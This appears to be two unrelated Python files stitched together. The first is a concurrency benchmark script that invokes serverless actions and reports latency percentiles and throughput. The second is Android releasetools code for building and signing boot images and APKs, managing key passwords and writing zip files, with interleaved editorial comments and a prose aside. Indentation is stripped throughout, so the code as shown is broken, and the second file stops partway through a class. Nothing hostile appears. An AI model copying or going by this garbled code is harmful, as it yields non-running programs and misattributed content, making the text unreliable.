# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
import os
import threading
import time
import sys, getopt
# this script should be executed in parent dir of scripts
def client(i,results,loopTimes):
print("client %d start" %i)
command = "./scripts/run-single.sh -R -t " + str(loopTimes)
r = os.popen(command)
text = r.read()
results[i] = text
print("client %d finished" %i)
def warmup(i,warmupTimes):
for j in range(warmupTimes):
r = os.popen("./scripts/action_invoke.sh")
text = r.read()
print("client %d warmup finished" %i)
def main():
argv = getargv()
clientNum = argv[0]
loopTimes = argv[1]
warmupTimes = argv[2]
threads = []
containerName = "alexa"
r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" %containerName)
r.read()
# First: warm up
for i in range(clientNum):
t = threading.Thread(target=warmup,args=(i,warmupTimes))
threads.append(t)
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
print("Warm up complete")
# Second: invoke the actions
# Initialize the results and the clients
threads = []
results = []
for i in range(clientNum):
results.append('')
# Create the clients
for i in range(clientNum):
t = threading.Thread(target=client,args=(i,results,loopTimes))
threads.append(t)
# start the clients
for i in range(clientNum):
threads[i].start()
for i in range(clientNum):
threads[i].join()
outfile = open("result.csv","w")
outfile.write("invokeTime,endTime\n")
latencies = []
minInvokeTime = 0x7fffffffffffffff
maxEndTime = 0
for i in range(clientNum):
# get and parse the result of a client
clientResult = parseResult(results[i])
# print the result of every loop of the client
for j in range(len(clientResult)):
outfile.write(clientResult[j][0] + ',' + clientResult[j][1] + '\n')
# Collect the latency
latency = int(clientResult[j][-1]) - int(clientResult[j][0])
latencies.append(latency)
# Find the first invoked action and the last return one.
if int(clientResult[j][0]) < minInvokeTime:
minInvokeTime = int(clientResult[j][0])
if int(clientResult[j][-1]) > maxEndTime:
maxEndTime = int(clientResult[j][-1])
formatResult(latencies,maxEndTime - minInvokeTime, clientNum, loopTimes, warmupTimes)
def parseResult(result):
lines = result.split('\n')
parsedResults = []
for line in lines:
if line.find("invokeTime") == -1:
continue
parsedTimes = ['','']
i = 0
count = 0
while count < 2:
while i < len(line):
if line[i].isdigit():
parsedTimes[count] = line[i:i+13]
i += 13
count += 1
continue
i += 1
parsedResults.append(parsedTimes)
return parsedResults
def getargv():
if len(sys.argv) != 3 and len(sys.argv) != 4:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
exit(0)
if not str.isdigit(sys.argv[1]) or not str.isdigit(sys.argv[2]) or int(sys.argv[1]) < 1 or int(sys.argv[2]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Client number and loop times must be an positive integer")
exit(0)
if len(sys.argv) == 4:
if not str.isdigit(sys.argv[3]) or int(sys.argv[3]) < 1:
print("Usage: python3 run.py <client number> <loop times> [<warm up times>]")
print("Warm up times must be an positive integer")
exit(0)
else:
return (int(sys.argv[1]),int(sys.argv[2]),1)
return (int(sys.argv[1]),int(sys.argv[2]),int(sys.argv[3]))
def formatResult(latencies,duration,client,loop,warmup):
requestNum = len(latencies)
latencies.sort()
duration = float(duration)
# calculate the average latency
total = 0
for latency in latencies:
total += latency
print("\n")
print("------------------ result ---------------------")
print("%s / %d requests finished in %.2f seconds" %(requestNum, (loop * client), (duration/1000)))
print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
if requestNum > 0:
averageLatency = float(total) / requestNum
_50pcLatency = latencies[int(requestNum * 0.5) - 1]
_75pcLatency = latencies[int(requestNum * 0.75) - 1]
_90pcLatency = latencies[int(requestNum * 0.9) - 1]
_95pcLatency = latencies[int(requestNum * 0.95) - 1]
_99pcLatency = latencies[int(requestNum * 0.99) - 1]
print("%.2f\t%d\t%d\t%d\t%d\t%d" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
print("throughput (n/s):\n%.2f" %(requestNum / (duration/1000)))
# output result to file
resultfile = open("eval-result.log","a")
resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
resultfile.write("client: %d, loop_times: %d, warmup_times: %d\n" % (client, loop, warmup))
resultfile.write("%s / %d requests finished in %.2f seconds\n" %(requestNum, (loop * client), (duration/1000)))
resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
if requestNum > 0:
resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" %(averageLatency,_50pcLatency,_75pcLatency,_90pcLatency,_95pcLatency,_99pcLatency))
resultfile.write("throughput (n/s):\n%.2f\n" %(requestNum / (duration/1000)))
main()
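The percentile columns printed by formatResult come from indexing the sorted latency list at int(n * pct) - 1. A tiny standalone sketch of that lookup (the sample latencies are made up):

def percentile(sorted_latencies, pct):
    # Same index formula formatResult uses: truncate n * pct, then subtract 1.
    return sorted_latencies[int(len(sorted_latencies) * pct) - 1]

latencies = sorted([120, 80, 95, 200, 150, 110, 130, 90, 105, 140])
print(percentile(latencies, 0.5), percentile(latencies, 0.9))  # -> 110 150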
|
common.py
|
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import errno
import getopt
import getpass
import imp
import os
import platform
import re
import shlex
import shutil
import subprocess
import sys
import tempfile
import threading
import time
import zipfile
import blockimgdiff
import rangelib
from hashlib import sha1 as sha1
class Options(object):
def __init__(self):
platform_search_path = {
"linux2": "out/host/linux-x86",
"darwin": "out/host/darwin-x86",
}
self.search_path = platform_search_path.get(sys.platform, None)
self.signapk_path = "framework/signapk.jar" # Relative to search_path
self.extra_signapk_args = []
self.java_path = "java" # Use the one on the path by default.
self.java_args = "-Xmx2048m" # JVM Args
self.public_key_suffix = ".x509.pem"
self.private_key_suffix = ".pk8"
# use otatools built boot_signer by default
self.boot_signer_path = "boot_signer"
self.boot_signer_args = []
self.verity_signer_path = None
self.verity_signer_args = []
self.verbose = False
self.tempfiles = []
self.device_specific = None
self.extras = {}
self.info_dict = None
self.source_info_dict = None
self.target_info_dict = None
self.worker_threads = None
OPTIONS = Options()
# Values for "certificate" in apkcerts that mean special things.
SPECIAL_CERT_STRINGS = ("PRESIGNED", "EXTERNAL")
class ExternalError(RuntimeError):
pass
def Run(args, **kwargs):
"""Create and return a subprocess.Popen object, printing the command
line on the terminal if -v was specified."""
if OPTIONS.verbose:
print " running: ", " ".join(args)
return subprocess.Popen(args, **kwargs)
def CloseInheritedPipes():
""" Gmake in MAC OS has file descriptor (PIPE) leak. We close those fds
before doing other work."""
if platform.system() != "Darwin":
return
for d in range(3, 1025):
try:
stat = os.fstat(d)
if stat is not None:
pipebit = stat[0] & 0x1000
if pipebit != 0:
os.close(d)
except OSError:
pass
def LoadInfoDict(input_file):
"""Read and parse the META/misc_info.txt key/value pairs from the
input target files and return a dict."""
def read_helper(fn):
if isinstance(input_file, zipfile.ZipFile):
return input_file.read(fn)
else:
path = os.path.join(input_file, *fn.split("/"))
try:
with open(path) as f:
return f.read()
except IOError as e:
if e.errno == errno.ENOENT:
raise KeyError(fn)
d = {}
try:
d = LoadDictionaryFromLines(read_helper("META/misc_info.txt").split("\n"))
except KeyError:
# ok if misc_info.txt doesn't exist
pass
# backwards compatibility: These values used to be in their own
# files. Look for them, in case we're processing an old
# target_files zip.
if "mkyaffs2_extra_flags" not in d:
try:
d["mkyaffs2_extra_flags"] = read_helper(
"META/mkyaffs2-extra-flags.txt").strip()
except KeyError:
# ok if flags don't exist
pass
if "recovery_api_version" not in d:
try:
d["recovery_api_version"] = read_helper(
"META/recovery-api-version.txt").strip()
except KeyError:
raise ValueError("can't find recovery API version in input target-files")
if "tool_extensions" not in d:
try:
d["tool_extensions"] = read_helper("META/tool-extensions.txt").strip()
except KeyError:
# ok if extensions don't exist
pass
if "fstab_version" not in d:
d["fstab_version"] = "1"
try:
data = read_helper("META/imagesizes.txt")
for line in data.split("\n"):
if not line:
continue
name, value = line.split(" ", 1)
if not value:
continue
if name == "blocksize":
d[name] = value
else:
d[name + "_size"] = value
except KeyError:
pass
def makeint(key):
if key in d:
d[key] = int(d[key], 0)
makeint("recovery_api_version")
makeint("blocksize")
makeint("system_size")
makeint("vendor_size")
makeint("userdata_size")
makeint("cache_size")
makeint("recovery_size")
makeint("boot_size")
makeint("fstab_version")
d["fstab"] = LoadRecoveryFSTab(read_helper, d["fstab_version"])
d["build.prop"] = LoadBuildProp(read_helper)
return d
def LoadBuildProp(read_helper):
try:
data = read_helper("SYSTEM/build.prop")
except KeyError:
print "Warning: could not find SYSTEM/build.prop in %s" % zip
data = ""
return LoadDictionaryFromLines(data.split("\n"))
def LoadDictionaryFromLines(lines):
d = {}
for line in lines:
line = line.strip()
if not line or line.startswith("#"):
continue
if "=" in line:
name, value = line.split("=", 1)
d[name] = value
return d
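# Example (LoadDictionaryFromLines): ["ro.build.id=ABC", "# comment", "", "x=1=2"]
# yields {"ro.build.id": "ABC", "x": "1=2"} -- blank/comment lines are skipped and
# only the first '=' splits the key from the value.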
def LoadRecoveryFSTab(read_helper, fstab_version):
class Partition(object):
def __init__(self, mount_point, fs_type, device, length, device2, context):
self.mount_point = mount_point
self.fs_type = fs_type
self.device = device
self.length = length
self.device2 = device2
self.context = context
try:
data = read_helper("RECOVERY/RAMDISK/etc/recovery.fstab")
except KeyError:
print "Warning: could not find RECOVERY/RAMDISK/etc/recovery.fstab"
data = ""
if fstab_version == 1:
d = {}
for line in data.split("\n"):
line = line.strip()
if not line or line.startswith("#"):
continue
pieces = line.split()
if not 3 <= len(pieces) <= 4:
raise ValueError("malformed recovery.fstab line: \"%s\"" % (line,))
options = None
if len(pieces) >= 4:
if pieces[3].startswith("/"):
device2 = pieces[3]
if len(pieces) >= 5:
options = pieces[4]
else:
device2 = None
options = pieces[3]
else:
device2 = None
mount_point = pieces[0]
length = 0
if options:
options = options.split(",")
for i in options:
if i.startswith("length="):
length = int(i[7:])
else:
print "%s: unknown option \"%s\"" % (mount_point, i)
d[mount_point] = Partition(mount_point=mount_point, fs_type=pieces[1],
device=pieces[2], length=length,
device2=device2)
elif fstab_version == 2:
d = {}
for line in data.split("\n"):
line = line.strip()
if not line or line.startswith("#"):
continue
# <src> <mnt_point> <type> <mnt_flags and options> <fs_mgr_flags>
pieces = line.split()
if len(pieces) != 5:
raise ValueError("malformed recovery.fstab line: \"%s\"" % (line,))
# Ignore entries that are managed by vold
options = pieces[4]
if "voldmanaged=" in options:
continue
# It's a good line, parse it
length = 0
options = options.split(",")
for i in options:
if i.startswith("length="):
length = int(i[7:])
else:
# Ignore all unknown options in the unified fstab
continue
mount_flags = pieces[3]
# Honor the SELinux context if present.
context = None
for i in mount_flags.split(","):
if i.startswith("context="):
context = i
mount_point = pieces[1]
d[mount_point] = Partition(mount_point=mount_point, fs_type=pieces[2],
device=pieces[0], length=length,
device2=None, context=context)
else:
raise ValueError("Unknown fstab_version: \"%d\"" % (fstab_version,))
return d
def DumpInfoDict(d):
for k, v in sorted(d.items()):
print "%-25s = (%s) %s" % (k, type(v).__name__, v)
def BuildBootableImage(sourcedir, fs_config_file, info_dict=None):
"""Take a kernel, cmdline, and ramdisk directory from the input (in
'sourcedir'), and turn them into a boot image. Return the image
  data, or None if sourcedir does not appear to contain files for
building the requested image."""
if (not os.access(os.path.join(sourcedir, "RAMDISK"), os.F_OK) or
not os.access(os.path.join(sourcedir, "kernel"), os.F_OK)):
return None
if info_dict is None:
info_dict = OPTIONS.info_dict
ramdisk_img = tempfile.NamedTemporaryFile()
img = tempfile.NamedTemporaryFile()
if os.access(fs_config_file, os.F_OK):
cmd = ["mkbootfs", "-f", fs_config_file, os.path.join(sourcedir, "RAMDISK")]
else:
cmd = ["mkbootfs", os.path.join(sourcedir, "RAMDISK")]
p1 = Run(cmd, stdout=subprocess.PIPE)
p2 = Run(["minigzip"],
stdin=p1.stdout, stdout=ramdisk_img.file.fileno())
p2.wait()
p1.wait()
assert p1.returncode == 0, "mkbootfs of %s ramdisk failed" % (sourcedir,)
assert p2.returncode == 0, "minigzip of %s ramdisk failed" % (sourcedir,)
# use MKBOOTIMG from environ, or "mkbootimg" if empty or not set
mkbootimg = os.getenv('MKBOOTIMG') or "mkbootimg"
cmd = [mkbootimg, "--kernel", os.path.join(sourcedir, "kernel")]
fn = os.path.join(sourcedir, "second")
if os.access(fn, os.F_OK):
cmd.append("--second")
cmd.append(fn)
fn = os.path.join(sourcedir, "cmdline")
if os.access(fn, os.F_OK):
cmd.append("--cmdline")
cmd.append(open(fn).read().rstrip("\n"))
fn = os.path.join(sourcedir, "base")
if os.access(fn, os.F_OK):
cmd.append("--base")
cmd.append(open(fn).read().rstrip("\n"))
fn = os.path.join(sourcedir, "pagesize")
if os.access(fn, os.F_OK):
cmd.append("--pagesize")
cmd.append(open(fn).read().rstrip("\n"))
args = info_dict.get("mkbootimg_args", None)
if args and args.strip():
cmd.extend(shlex.split(args))
img_unsigned = None
if info_dict.get("vboot", None):
img_unsigned = tempfile.NamedTemporaryFile()
cmd.extend(["--ramdisk", ramdisk_img.name,
"--output", img_unsigned.name])
else:
cmd.extend(["--ramdisk", ramdisk_img.name,
"--output", img.name])
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
assert p.returncode == 0, "mkbootimg of %s image failed" % (
os.path.basename(sourcedir),)
if (info_dict.get("boot_signer", None) == "true" and
info_dict.get("verity_key", None)):
path = "/" + os.path.basename(sourcedir).lower()
cmd = [OPTIONS.boot_signer_path]
cmd.extend(OPTIONS.boot_signer_args)
cmd.extend([path, img.name,
info_dict["verity_key"] + ".pk8",
info_dict["verity_key"] + ".x509.pem", img.name])
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
assert p.returncode == 0, "boot_signer of %s image failed" % path
# Sign the image if vboot is non-empty.
elif info_dict.get("vboot", None):
path = "/" + os.path.basename(sourcedir).lower()
img_keyblock = tempfile.NamedTemporaryFile()
cmd = [info_dict["vboot_signer_cmd"], info_dict["futility"],
img_unsigned.name, info_dict["vboot_key"] + ".vbpubk",
info_dict["vboot_key"] + ".vbprivk",
info_dict["vboot_subkey"] + ".vbprivk",
img_keyblock.name,
img.name]
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
assert p.returncode == 0, "vboot_signer of %s image failed" % path
# Clean up the temp files.
img_unsigned.close()
img_keyblock.close()
img.seek(os.SEEK_SET, 0)
data = img.read()
ramdisk_img.close()
img.close()
return data
def GetBootableImage(name, prebuilt_name, unpack_dir, tree_subdir,
info_dict=None):
"""Return a File object (with name 'name') with the desired bootable
image. Look for it in 'unpack_dir'/BOOTABLE_IMAGES under the name
'prebuilt_name', otherwise look for it under 'unpack_dir'/IMAGES,
otherwise construct it from the source files in
'unpack_dir'/'tree_subdir'."""
prebuilt_path = os.path.join(unpack_dir, "BOOTABLE_IMAGES", prebuilt_name)
if os.path.exists(prebuilt_path):
print "using prebuilt %s from BOOTABLE_IMAGES..." % (prebuilt_name,)
return File.FromLocalFile(name, prebuilt_path)
prebuilt_path = os.path.join(unpack_dir, "IMAGES", prebuilt_name)
if os.path.exists(prebuilt_path):
print "using prebuilt %s from IMAGES..." % (prebuilt_name,)
return File.FromLocalFile(name, prebuilt_path)
print "building image from target_files %s..." % (tree_subdir,)
fs_config = "META/" + tree_subdir.lower() + "_filesystem_config.txt"
data = BuildBootableImage(os.path.join(unpack_dir, tree_subdir),
os.path.join(unpack_dir, fs_config),
info_dict)
if data:
return File(name, data)
return None
def UnzipTemp(filename, pattern=None):
"""Unzip the given archive into a temporary directory and return the name.
If filename is of the form "foo.zip+bar.zip", unzip foo.zip into a
temp dir, then unzip bar.zip into that_dir/BOOTABLE_IMAGES.
Returns (tempdir, zipobj) where zipobj is a zipfile.ZipFile (of the
main file), open for reading.
"""
tmp = tempfile.mkdtemp(prefix="targetfiles-")
OPTIONS.tempfiles.append(tmp)
def unzip_to_dir(filename, dirname):
cmd = ["unzip", "-o", "-q", filename, "-d", dirname]
if pattern is not None:
cmd.append(pattern)
p = Run(cmd, stdout=subprocess.PIPE)
p.communicate()
if p.returncode != 0:
raise ExternalError("failed to unzip input target-files \"%s\"" %
(filename,))
m = re.match(r"^(.*[.]zip)\+(.*[.]zip)$", filename, re.IGNORECASE)
if m:
unzip_to_dir(m.group(1), tmp)
unzip_to_dir(m.group(2), os.path.join(tmp, "BOOTABLE_IMAGES"))
filename = m.group(1)
else:
unzip_to_dir(filename, tmp)
return tmp, zipfile.ZipFile(filename, "r")
def GetKeyPasswords(keylist):
"""Given a list of keys, prompt the user to enter passwords for
those which require them. Return a {key: password} dict. password
will be None if the key has no password."""
no_passwords = []
need_passwords = []
key_passwords = {}
devnull = open("/dev/null", "w+b")
for k in sorted(keylist):
# We don't need a password for things that aren't really keys.
if k in SPECIAL_CERT_STRINGS:
no_passwords.append(k)
continue
p = Run(["openssl", "pkcs8", "-in", k+OPTIONS.private_key_suffix,
"-inform", "DER", "-nocrypt"],
stdin=devnull.fileno(),
stdout=devnull.fileno(),
stderr=subprocess.STDOUT)
p.communicate()
if p.returncode == 0:
# Definitely an unencrypted key.
no_passwords.append(k)
else:
p = Run(["openssl", "pkcs8", "-in", k+OPTIONS.private_key_suffix,
"-inform", "DER", "-passin", "pass:"],
stdin=devnull.fileno(),
stdout=devnull.fileno(),
stderr=subprocess.PIPE)
_, stderr = p.communicate()
if p.returncode == 0:
# Encrypted key with empty string as password.
key_passwords[k] = ''
elif stderr.startswith('Error decrypting key'):
# Definitely encrypted key.
# It would have said "Error reading key" if it didn't parse correctly.
need_passwords.append(k)
else:
# Potentially, a type of key that openssl doesn't understand.
# We'll let the routines in signapk.jar handle it.
no_passwords.append(k)
devnull.close()
key_passwords.update(PasswordManager().GetPasswords(need_passwords))
key_passwords.update(dict.fromkeys(no_passwords, None))
return key_passwords
def SignFile(input_name, output_name, key, password, align=None,
whole_file=False):
"""Sign the input_name zip/jar/apk, producing output_name. Use the
given key and password (the latter may be None if the key does not
  have a password).
If align is an integer > 1, zipalign is run to align stored files in
the output zip on 'align'-byte boundaries.
If whole_file is true, use the "-w" option to SignApk to embed a
signature that covers the whole file in the archive comment of the
zip file.
"""
if align == 0 or align == 1:
align = None
if align:
temp = tempfile.NamedTemporaryFile()
sign_name = temp.name
else:
sign_name = output_name
cmd = [OPTIONS.java_path, OPTIONS.java_args, "-jar",
os.path.join(OPTIONS.search_path, OPTIONS.signapk_path)]
cmd.extend(OPTIONS.extra_signapk_args)
if whole_file:
cmd.append("-w")
cmd.extend([key + OPTIONS.public_key_suffix,
key + OPTIONS.private_key_suffix,
input_name, sign_name])
p = Run(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
if password is not None:
password += "\n"
p.communicate(password)
if p.returncode != 0:
raise ExternalError("signapk.jar failed: return code %s" % (p.returncode,))
if align:
p = Run(["zipalign", "-f", "-p", str(align), sign_name, output_name])
p.communicate()
if p.returncode != 0:
raise ExternalError("zipalign failed: return code %s" % (p.returncode,))
temp.close()
def CheckSize(data, target, info_dict):
"""Check the data string passed against the max size limit, if
any, for the given target. Raise exception if the data is too big.
Print a warning if the data is nearing the maximum size."""
if target.endswith(".img"):
target = target[:-4]
mount_point = "/" + target
fs_type = None
limit = None
if info_dict["fstab"]:
if mount_point == "/userdata":
mount_point = "/data"
p = info_dict["fstab"][mount_point]
fs_type = p.fs_type
device = p.device
if "/" in device:
device = device[device.rfind("/")+1:]
limit = info_dict.get(device + "_size", None)
if not fs_type or not limit:
return
if fs_type == "yaffs2":
# image size should be increased by 1/64th to account for the
# spare area (64 bytes per 2k page)
limit = limit / 2048 * (2048+64)
size = len(data)
pct = float(size) * 100.0 / limit
msg = "%s size (%d) is %.2f%% of limit (%d)" % (target, size, pct, limit)
if pct >= 99.0:
raise ExternalError(msg)
elif pct >= 95.0:
print
print " WARNING: ", msg
print
elif OPTIONS.verbose:
print " ", msg
def ReadApkCerts(tf_zip):
"""Given a target_files ZipFile, parse the META/apkcerts.txt file
and return a {package: cert} dict."""
certmap = {}
for line in tf_zip.read("META/apkcerts.txt").split("\n"):
line = line.strip()
if not line:
continue
m = re.match(r'^name="(.*)"\s+certificate="(.*)"\s+'
r'private_key="(.*)"$', line)
if m:
name, cert, privkey = m.groups()
public_key_suffix_len = len(OPTIONS.public_key_suffix)
private_key_suffix_len = len(OPTIONS.private_key_suffix)
if cert in SPECIAL_CERT_STRINGS and not privkey:
certmap[name] = cert
elif (cert.endswith(OPTIONS.public_key_suffix) and
privkey.endswith(OPTIONS.private_key_suffix) and
cert[:-public_key_suffix_len] == privkey[:-private_key_suffix_len]):
certmap[name] = cert[:-public_key_suffix_len]
else:
raise ValueError("failed to parse line from apkcerts.txt:\n" + line)
return certmap
COMMON_DOCSTRING = """
-p (--path) <dir>
Prepend <dir>/bin to the list of places to search for binaries
run by this script, and expect to find jars in <dir>/framework.
-s (--device_specific) <file>
Path to the python module containing device-specific
releasetools code.
-x (--extra) <key=value>
Add a key/value pair to the 'extras' dict, which device-specific
extension code may look at.
-v (--verbose)
Show command lines being executed.
-h (--help)
Display this usage message and exit.
"""
def Usage(docstring):
print docstring.rstrip("\n")
print COMMON_DOCSTRING
def ParseOptions(argv,
docstring,
extra_opts="", extra_long_opts=(),
extra_option_handler=None):
"""Parse the options in argv and return any arguments that aren't
flags. docstring is the calling module's docstring, to be displayed
for errors and -h. extra_opts and extra_long_opts are for flags
defined by the caller, which are processed by passing them to
extra_option_handler."""
try:
opts, args = getopt.getopt(
argv, "hvp:s:x:" + extra_opts,
["help", "verbose", "path=", "signapk_path=", "extra_signapk_args=",
"java_path=", "java_args=", "public_key_suffix=",
"private_key_suffix=", "boot_signer_path=", "boot_signer_args=",
"verity_signer_path=", "verity_signer_args=", "device_specific=",
"extra="] +
list(extra_long_opts))
except getopt.GetoptError as err:
Usage(docstring)
print "**", str(err), "**"
sys.exit(2)
for o, a in opts:
if o in ("-h", "--help"):
Usage(docstring)
sys.exit()
elif o in ("-v", "--verbose"):
OPTIONS.verbose = True
elif o in ("-p", "--path"):
OPTIONS.search_path = a
elif o in ("--signapk_path",):
OPTIONS.signapk_path = a
elif o in ("--extra_signapk_args",):
OPTIONS.extra_signapk_args = shlex.split(a)
elif o in ("--java_path",):
OPTIONS.java_path = a
elif o in ("--java_args",):
OPTIONS.java_args = a
elif o in ("--public_key_suffix",):
OPTIONS.public_key_suffix = a
elif o in ("--private_key_suffix",):
OPTIONS.private_key_suffix = a
elif o in ("--boot_signer_path",):
OPTIONS.boot_signer_path = a
elif o in ("--boot_signer_args",):
OPTIONS.boot_signer_args = shlex.split(a)
elif o in ("--verity_signer_path",):
OPTIONS.verity_signer_path = a
elif o in ("--verity_signer_args",):
OPTIONS.verity_signer_args = shlex.split(a)
elif o in ("-s", "--device_specific"):
OPTIONS.device_specific = a
elif o in ("-x", "--extra"):
key, value = a.split("=", 1)
OPTIONS.extras[key] = value
else:
if extra_option_handler is None or not extra_option_handler(o, a):
assert False, "unknown option \"%s\"" % (o,)
if OPTIONS.search_path:
os.environ["PATH"] = (os.path.join(OPTIONS.search_path, "bin") +
os.pathsep + os.environ["PATH"])
return args
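# Hedged usage sketch (editor's addition): how a caller might route its own
# flag through extra_long_opts / extra_option_handler. The "--my_flag" option
# and surrounding names are hypothetical.
def _example_parse_options(argv):
  settings = {}
  def option_handler(o, a):
    if o == "--my_flag":   # hypothetical caller-specific flag
      settings["my_flag"] = a
      return True
    return False           # unrecognized options make ParseOptions assert
  args = ParseOptions(argv, __doc__,
                      extra_long_opts=["my_flag="],
                      extra_option_handler=option_handler)
  return args, settings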
def MakeTempFile(prefix=None, suffix=None):
"""Make a temp file and add it to the list of things to be deleted
when Cleanup() is called. Return the filename."""
fd, fn = tempfile.mkstemp(prefix=prefix, suffix=suffix)
os.close(fd)
OPTIONS.tempfiles.append(fn)
return fn
def Cleanup():
for i in OPTIONS.tempfiles:
if os.path.isdir(i):
shutil.rmtree(i)
else:
os.remove(i)
class PasswordManager(object):
def __init__(self):
self.editor = os.getenv("EDITOR", None)
self.pwfile = os.getenv("ANDROID_PW_FILE", None)
def GetPasswords(self, items):
"""Get passwords corresponding to each string in 'items',
returning a dict. (The dict may have keys in addition to the
values in 'items'.)
Uses the passwords in $ANDROID_PW_FILE if available, letting the
user edit that file to add more needed passwords. If no editor is
available, or $ANDROID_PW_FILE isn't defined, prompts the user
interactively in the ordinary way.
"""
current = self.ReadFile()
first = True
while True:
missing = []
for i in items:
if i not in current or not current[i]:
missing.append(i)
# Are all the passwords already in the file?
if not missing:
return current
for i in missing:
current[i] = ""
if not first:
print "key file %s still missing some passwords." % (self.pwfile,)
answer = raw_input("try to edit again? [y]> ").strip()
if answer and answer[0] not in 'yY':
raise RuntimeError("key passwords unavailable")
first = False
current = self.UpdateAndReadFile(current)
def PromptResult(self, current): # pylint: disable=no-self-use
"""Prompt the user to enter a value (password) for each key in
'current' whose value is false. Returns a new dict with all the
values.
"""
result = {}
for k, v in sorted(current.iteritems()):
if v:
result[k] = v
else:
while True:
result[k] = getpass.getpass(
"Enter password for %s key> " % k).strip()
if result[k]:
break
return result
def UpdateAndReadFile(self, current):
if not self.editor or not self.pwfile:
return self.PromptResult(current)
f = open(self.pwfile, "w")
os.chmod(self.pwfile, 0o600)
f.write("# Enter key passwords between the [[[ ]]] brackets.\n")
f.write("# (Additional spaces are harmless.)\n\n")
first_line = None
sorted_list = sorted([(not v, k, v) for (k, v) in current.iteritems()])
for i, (_, k, v) in enumerate(sorted_list):
f.write("[[[ %s ]]] %s\n" % (v, k))
if not v and first_line is None:
# position cursor on first line with no password.
first_line = i + 4
f.close()
p = Run([self.editor, "+%d" % (first_line,), self.pwfile])
_, _ = p.communicate()
return self.ReadFile()
def ReadFile(self):
result = {}
if self.pwfile is None:
return result
try:
f = open(self.pwfile, "r")
for line in f:
line = line.strip()
if not line or line[0] == '#':
continue
m = re.match(r"^\[\[\[\s*(.*?)\s*\]\]\]\s*(\S+)$", line)
if not m:
print "failed to parse password file: ", line
else:
result[m.group(2)] = m.group(1)
f.close()
except IOError as e:
if e.errno != errno.ENOENT:
print "error reading password file: ", str(e)
return result
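# Illustrative file format (editor's addition): ReadFile() above parses lines
# in the layout written by UpdateAndReadFile(), e.g.
#
#   # Enter key passwords between the [[[ ]]] brackets.
#   [[[ secret123 ]]] build/target/product/security/releasekey
#
# which yields {"build/target/product/security/releasekey": "secret123"}.
# The key name and password shown are hypothetical.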
def ZipWrite(zip_file, filename, arcname=None, perms=0o644,
compress_type=None):
import datetime
# http://b/18015246
# Python 2.7's zipfile implementation wrongly thinks that zip64 is required
# for files larger than 2GiB. We can work around this by adjusting their
# limit. Note that `zipfile.writestr()` will not work for strings larger than
# 2GiB. The Python interpreter sometimes rejects strings that large (though
# it isn't clear to me exactly what circumstances cause this).
# `zipfile.write()` must be used directly to work around this.
#
# This mess can be avoided if we port to python3.
saved_zip64_limit = zipfile.ZIP64_LIMIT
zipfile.ZIP64_LIMIT = (1 << 32) - 1
if compress_type is None:
compress_type = zip_file.compression
if arcname is None:
arcname = filename
saved_stat = os.stat(filename)
try:
# `zipfile.write()` doesn't allow us to pass ZipInfo, so just modify the
# file to be zipped and reset it when we're done.
os.chmod(filename, perms)
# Use a fixed timestamp so the output is repeatable.
epoch = datetime.datetime.fromtimestamp(0)
timestamp = (datetime.datetime(2009, 1, 1) - epoch).total_seconds()
os.utime(filename, (timestamp, timestamp))
zip_file.write(filename, arcname=arcname, compress_type=compress_type)
finally:
os.chmod(filename, saved_stat.st_mode)
os.utime(filename, (saved_stat.st_atime, saved_stat.st_mtime))
zipfile.ZIP64_LIMIT = saved_zip64_limit
def ZipWriteStr(zip_file, zinfo_or_arcname, data, perms=None,
compress_type=None):
"""Wrap zipfile.writestr() function to work around the zip64 limit.
Even with the ZIP64_LIMIT workaround, it won't allow writing a string
longer than 2GiB. It gives 'OverflowError: size does not fit in an int'
when calling crc32(bytes).
But it still works fine to write a shorter string into a large zip file.
We should use ZipWrite() whenever possible, and only use ZipWriteStr()
when we know the string won't be too long.
"""
saved_zip64_limit = zipfile.ZIP64_LIMIT
zipfile.ZIP64_LIMIT = (1 << 32) - 1
if not isinstance(zinfo_or_arcname, zipfile.ZipInfo):
zinfo = zipfile.ZipInfo(filename=zinfo_or_arcname)
zinfo.compress_type = zip_file.compression
if perms is None:
perms = 0o644
else:
zinfo = zinfo_or_arcname
# If compress_type is given, it overrides the value in zinfo.
if compress_type is not None:
zinfo.compress_type = compress_type
# If perms is given, it has a priority.
if perms is not None:
zinfo.external_attr = perms << 16
# Use a fixed timestamp so the output is repeatable.
zinfo.date_time = (2009, 1, 1, 0, 0, 0)
zip_file.writestr(zinfo, data)
zipfile.ZIP64_LIMIT = saved_zip64_limit
def ZipClose(zip_file):
# http://b/18015246
# zipfile also refers to ZIP64_LIMIT during close() when it writes out the
# central directory.
saved_zip64_limit = zipfile.ZIP64_LIMIT
zipfile.ZIP64_LIMIT = (1 << 32) - 1
zip_file.close()
zipfile.ZIP64_LIMIT = saved_zip64_limit
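# Hedged usage sketch (editor's addition): the three helpers above are meant
# to be used together so the raised ZIP64_LIMIT covers the whole write/close
# sequence. File names are hypothetical.
def _example_zip_helpers():
  z = zipfile.ZipFile("out.zip", "w", compression=zipfile.ZIP_DEFLATED)
  ZipWrite(z, "system.img", arcname="images/system.img")  # large files: ZipWrite
  ZipWriteStr(z, "META/note.txt", "short payload")         # short strings only
  ZipClose(z)                                              # close() needs the workaround too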
class DeviceSpecificParams(object):
